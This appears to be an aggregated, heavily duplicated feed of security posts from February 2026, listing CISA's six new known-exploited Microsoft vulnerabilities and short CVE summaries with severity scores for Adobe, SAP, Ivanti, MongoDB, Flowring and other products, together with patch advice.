📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🟠 CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔐 CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T19:56:57
2 posts
🟠 CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
3 posts
1 repos
🚨 CVE-2026-21531: Critical RCE in Azure AI Language Authoring SDK v1.0.0 via deserialization of untrusted data. Unauthenticated attackers can execute code remotely. Restrict access & monitor endpoints until patched. https://radar.offseq.com/threat/cve-2026-21531-cwe-502-deserialization-of-untruste-4a5578f9 #OffSeq #Azure #Security
##🔴 CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-21531 - Critical (9.8)
Deserialization of untrusted data in Azure SDK allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:54
2 posts
🟠 CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-25611 - High (7.5)
A series of specifically crafted, unauthenticated messages can exhaust available memory and crash a MongoDB server.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-25611/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:53
2 posts
🟠 CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21328 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21328/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21322 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21318 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21318/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:52
2 posts
🟠 CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21327 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21327/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21320 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21320/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:51
2 posts
🟠 CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21257 - High (8)
Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an authorized attacker to elevate privileges over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21257/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21255 - High (8.8)
Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21255/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21334 - High (7.8)
Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21334/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:50
2 posts
🟠 CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21516 - High (8.8)
Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21516/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T18:30:49
2 posts
New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##New.
Ivanti's vulnerabilities have been wreaking havoc in Europe.
Meanwhile:
Ivanti February 2026 Security Update https://www.ivanti.com/blog/february-2026-security-update
The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:
Ivanti Security Advisory EPM February 2026 for EPM 2024 https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024 #Ivanti #infosec #vulnerability
##updated 2026-02-10T15:30:34
4 posts
🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-6967 - High (8.7)
Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.
NOTE: T...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-6967/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
5 posts
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws
SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.
**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/sap-february-2026-updates-patch-critical-crm-s-4hana-and-netweaver-flaws-m-7-v-w-t/gD2P6Ple2L
🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: https://radar.offseq.com/threat/cve-2026-0509-cwe-862-missing-authorization-in-sap-3bdb181d #OffSeq #SAP #CVE20260509 #infosec
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2026-0509 - Critical (9.6)
SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-22923 - High (7.8)
A vulnerability has been identified in NX (All versions < V2512). The affected application contains a data validation vulnerability that could allow an attacker with local access to interfere with internal data during the PDF export process tha...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22923/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🔴 CVE-2025-11242 - Critical (9.8)
Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-11242/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2094 - High (8.8)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2094/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🔴 CVE-2026-2095 - Critical (9.8)
Agentflow developed by Flowring has an Authentication Bypass vulnerability, allowing unauthenticated remote attackers to exploit a specific functionality to obtain arbitrary user authentication token and log into the system as any user.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2095/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-2093 - High (7.5)
Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read database contents.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2093/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-0490 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a specific network request to the trusted endpoint that breaks the authentication, which prevents the legitimate users from accessing the platform. As a result, it has a h...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
2 posts
🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-24322 - High (7.7)
SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perform the necessary authorization checks for authenticated users, allowing sensitive information to be disclosed. This vulnerability has a high impact on confidentiality...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24322/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T15:22:54.740000
1 posts
🟠 CVE-2026-0485 - High (7.5)
SAP BusinessObjects BI Platform allows an unauthenticated attacker to send specially crafted requests that could cause the Content Management Server (CMS) to crash and automatically restart. By repeatedly submitting these requests, the attacker co...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0485/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
